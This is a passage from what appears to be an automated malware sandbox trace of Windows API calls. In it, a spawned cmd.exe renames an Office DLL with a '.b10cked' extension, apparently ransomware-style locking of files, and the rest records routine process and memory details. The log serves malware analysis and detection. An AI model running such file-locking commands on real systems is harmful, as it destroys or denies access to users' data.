lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0160.877] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x1ce8b0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0160.877] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x1ce894, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x1ce894*=0x1a) returned 1 [0160.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0160.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0160.881] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0160.884] _get_osfhandle (_FileHandle=0) returned 0x3 [0160.884] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0160.884] SetConsoleInputExeNameW () returned 0x1 [0160.885] GetConsoleOutputCP () returned 0x1b5 [0160.885] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0160.885] SetThreadUILanguage (LangId=0x0) returned 0x409 [0160.885] exit (_Code=0) Process: id = "274" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16b40" os_pid = "0x90c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22233 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22234 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22235 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22236 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 22237 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22238 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22239 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22240 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22241 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22242 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22243 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22244 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22245 start_va = 0x80000 end_va = 0x17ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 22246 start_va = 0x2b0000 end_va = 0x316fff entry_point = 0x2b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22247 start_va = 0x360000 end_va = 0x36ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 22248 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22249 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22250 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22251 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22252 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22253 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22254 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22255 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22256 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22257 start_va = 0x370000 end_va = 0x437fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000370000" filename = "" Region: id = 22258 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22259 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22260 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 22261 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 22262 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 22263 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 22264 start_va = 0x440000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000440000" filename = "" Region: id = 22265 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 22266 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 339 os_tid = 0xd68 [0161.690] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2afa34 | out: lpSystemTimeAsFileTime=0x2afa34*(dwLowDateTime=0x99c0efa0, dwHighDateTime=0x1d440a9)) [0161.690] GetCurrentProcessId () returned 0x90c [0161.690] GetCurrentThreadId () returned 0xd68 [0161.690] GetTickCount () returned 0x310e1 [0161.690] QueryPerformanceCounter (in: lpPerformanceCount=0x2afa2c | out: lpPerformanceCount=0x2afa2c*=21847923698) returned 1 [0161.691] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0161.691] __set_app_type (_Type=0x1) [0161.691] __p__fmode () returned 0x76b331f4 [0161.691] __p__commode () returned 0x76b331fc [0161.691] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0161.691] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0161.691] GetCurrentThreadId () returned 0xd68 [0161.691] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd68) returned 0x38 [0161.691] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.691] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0161.691] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.691] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0161.691] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af9c4 | out: phkResult=0x2af9c4*=0x0) returned 0x2 [0161.691] VirtualQuery (in: lpAddress=0x2af9fb, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.691] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0161.691] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0161.691] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.692] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af994, dwLength=0x1c | out: lpBuffer=0x2af994*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0161.692] GetConsoleOutputCP () returned 0x1b5 [0161.692] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.692] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0161.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0161.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.692] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0161.692] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.692] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.692] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.692] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0161.692] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.692] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0161.693] GetEnvironmentStringsW () returned 0x90210* [0161.693] FreeEnvironmentStringsW (penv=0x90210) returned 1 [0161.693] GetEnvironmentStringsW () returned 0x90210* [0161.693] FreeEnvironmentStringsW (penv=0x90210) returned 1 [0161.693] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae934 | out: phkResult=0x2ae934*=0x40) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0xa0, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x0, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegCloseKey (hKey=0x40) returned 0x0 [0161.693] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae934 | out: phkResult=0x2ae934*=0x40) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x40, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x1, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x0, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.693] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x9, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.694] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x4, lpData=0x2ae940*=0x9, lpcbData=0x2ae938*=0x4) returned 0x0 [0161.694] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae93c, lpData=0x2ae940, lpcbData=0x2ae938*=0x1000 | out: lpType=0x2ae93c*=0x0, lpData=0x2ae940*=0x9, lpcbData=0x2ae938*=0x1000) returned 0x2 [0161.694] RegCloseKey (hKey=0x40) returned 0x0 [0161.694] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886383 [0161.694] srand (_Seed=0x5b886383) [0161.694] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"" [0161.694] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\1036\\XLINTL32.DLL.trx_dll.b10cked\"" [0161.694] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.694] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x91970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0161.694] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0161.694] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0161.694] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.694] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0161.694] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0161.694] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0161.694] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0161.694] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0161.694] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0161.694] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0161.694] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0161.694] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0161.695] GetEnvironmentStringsW () returned 0x92360* [0161.695] FreeEnvironmentStringsW (penv=0x92360) returned 1 [0161.695] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.695] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0161.695] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0161.695] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0161.695] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0161.695] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0161.695] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0161.695] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0161.695] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0161.695] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0161.695] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.695] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af700, lpFilePart=0x2af6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af6fc*="Desktop") returned 0x18 [0161.695] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.695] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af47c | out: lpFindFileData=0x2af47c) returned 0x909f0 [0161.695] FindClose (in: hFindFile=0x909f0 | out: hFindFile=0x909f0) returned 1 [0161.695] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af47c | out: lpFindFileData=0x2af47c) returned 0x909f0 [0161.696] FindClose (in: hFindFile=0x909f0 | out: hFindFile=0x909f0) returned 1 [0161.696] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af47c | out: lpFindFileData=0x2af47c) returned 0x909f0 [0161.696] FindClose (in: hFindFile=0x909f0 | out: hFindFile=0x909f0) returned 1 [0161.696] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0161.696] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0161.696] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0161.696] GetEnvironmentStringsW () returned 0x90210* [0161.696] FreeEnvironmentStringsW (penv=0x90210) returned 1 [0161.696] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0161.696] GetConsoleOutputCP () returned 0x1b5 [0161.697] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0161.697] GetUserDefaultLCID () returned 0x409 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af840, cchData=128 | out: lpLCData="0") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af840, cchData=128 | out: lpLCData="0") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af840, cchData=128 | out: lpLCData="1") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0161.697] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0161.697] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0161.698] GetConsoleTitleW (in: lpConsoleTitle=0x80930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.698] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0161.698] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0161.698] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0161.698] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0161.699] _wcsicmp (_String1="move", _String2=")") returned 68 [0161.699] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0161.699] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0161.699] _wcsicmp (_String1="IF", _String2="move") returned -4 [0161.699] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0161.699] _wcsicmp (_String1="REM", _String2="move") returned 5 [0161.699] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0161.702] GetConsoleTitleW (in: lpConsoleTitle=0x2af538, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0161.703] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0161.703] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0161.703] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0161.703] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="CD") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="REN") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="SET") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0161.703] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0161.703] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0161.703] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0161.703] _wcsicmp (_String1="move", _String2="MD") returned 11 [0161.703] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0161.703] _wcsicmp (_String1="move", _String2="RD") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0161.703] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0161.703] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0161.703] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0161.703] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0161.703] _wcsicmp (_String1="move", _String2="VER") returned -9 [0161.703] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0161.703] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0161.703] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0161.703] _wcsicmp (_String1="move", _String2="START") returned -6 [0161.703] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0161.704] 